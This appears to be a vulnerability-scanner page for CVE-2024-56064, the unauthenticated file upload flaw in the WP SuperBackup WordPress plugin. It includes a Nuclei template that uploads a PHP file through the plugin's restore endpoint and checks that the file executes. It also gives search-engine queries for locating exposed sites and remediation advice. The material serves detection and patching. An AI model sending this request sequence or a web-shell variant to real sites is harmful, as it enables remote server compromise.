WP SuperBackup <= 2.3.3 - Unauthenticated Arbitrary File Upload to RCE
CVE-2024-56064
Early Release
Description
The Super Backup & Clone - Migrate for WordPress plugin (indeed-wp-superbackup) is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to and including 2.3.3. Unauthenticated attackers can upload arbitrary PHP files on the affected site's server which leads to remote code execution. Files are written to /wp-content/uploads/isnapshots/.
Severity
Critical
CVSS Score
10
Exploit Probability
15%
Affected Product
indeed-wp-superbackup
Published Date
August 13, 2026
Template Author
princechaddha
CVE-2024-56064.yaml
id: CVE-2024-56064
info:
name: WP SuperBackup <= 2.3.3 - Unauthenticated Arbitrary File Upload to RCE
author: princechaddha
severity: critical
description: |
The Super Backup & Clone - Migrate for WordPress plugin (indeed-wp-superbackup) is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to and including 2.3.3. Unauthenticated attackers can upload arbitrary PHP files on the affected site's server which leads to remote code execution. Files are written to /wp-content/uploads/isnapshots/.
impact: |
Unauthenticated remote code execution on the affected WordPress server. Attacker can upload a web shell to achieve full server compromise, credential theft, and persistent backdoor installation.
remediation: |
Update the WP SuperBackup plugin to version 2.4 or later. If update is not possible, remove or deactivate the plugin immediately.
reference:
- https://patchstack.com/database/wordpress/plugin/indeed-wp-superbackup/vulnerability/wordpress-wp-superbackup-plugin-2-3-3-unauthenticated-arbitrary-file-upload-vulnerability
- https://github.com/RandomRobbieBF/CVE-2024-56064
- https://nvd.nist.gov/vuln/detail/CVE-2024-56064
- https://wpscan.com/vulnerability/ab939130-3a48-4179-8722-0f09340aee4d/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2024-56064
cwe-id: CWE-434
epss-score: 0.15342
epss-percentile: 0.96471
metadata:
verified: true
max-request: 2
vendor: azzaroco
product: indeed-wp-superbackup
framework: wordpress
publicwww-query: "/wp-content/plugins/indeed-wp-superbackup/"
fofa-query: body="/wp-content/plugins/indeed-wp-superbackup/"
shodan-query: http.html:"/wp-content/plugins/indeed-wp-superbackup/"
tags: cve,cve2024,wordpress,wp-plugin,wp,rce,file-upload,intrusive,vkev,unauth,superbackup,vuln
variables:
fname: "{{rand_base(8)}}"
marker: "{{randstr}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin.php?page=ibk_admin&tab=restore HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------CVE202456064Bound
X-Requested-With: XMLHttpRequest
Connection: close
-----------------------------CVE202456064Bound
Content-Disposition: form-data; name="ibk_restore_migrate_action"
1
-----------------------------CVE202456064Bound
Content-Disposition: form-data; name="restore_type"
restore_file
-----------------------------CVE202456064Bound
Content-Disposition: form-data; name="restore_url"
-----------------------------CVE202456064Bound
Content-Disposition: form-data; name="upload_file"; filename="{{fname}}.php"
Content-Type: application/octet-stream
<?php echo "{{marker}}"; unlink(__FILE__); ?>
-----------------------------CVE202456064Bound--
matchers:
- type: status
status:
- 200
- 302
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/isnapshots/{{fname}}.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{marker}}"
- type: status
status:
- 200
# digest: 4a0a00473045022100d1a44c64451c1bc3be9a7e2084594f90b9f8e307cc13d5efacb605105ff730110220111999ca7b8d34e842034cefbbeeb5f37b0043e849f6ebcc6b06251f33366904:922c64590222798bb761d5b6d8e7295010.0Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2024-56064
CWE ID:
cwe-434
References
https://patchstack.com/database/wordpress/plugin/indeed-wp-superbackup/vulnerability/wordpress-wp-superbackup-plugin-2-3-3-unauthenticated-arbitrary-file-upload-vulnerabilityhttps://github.com/RandomRobbieBF/CVE-2024-56064https://nvd.nist.gov/vuln/detail/CVE-2024-56064https://wpscan.com/vulnerability/ab939130-3a48-4179-8722-0f09340aee4d/
Remediation Steps
Update the WP SuperBackup plugin to version 2.4 or later. If update is not possible, remove or deactivate the plugin immediately.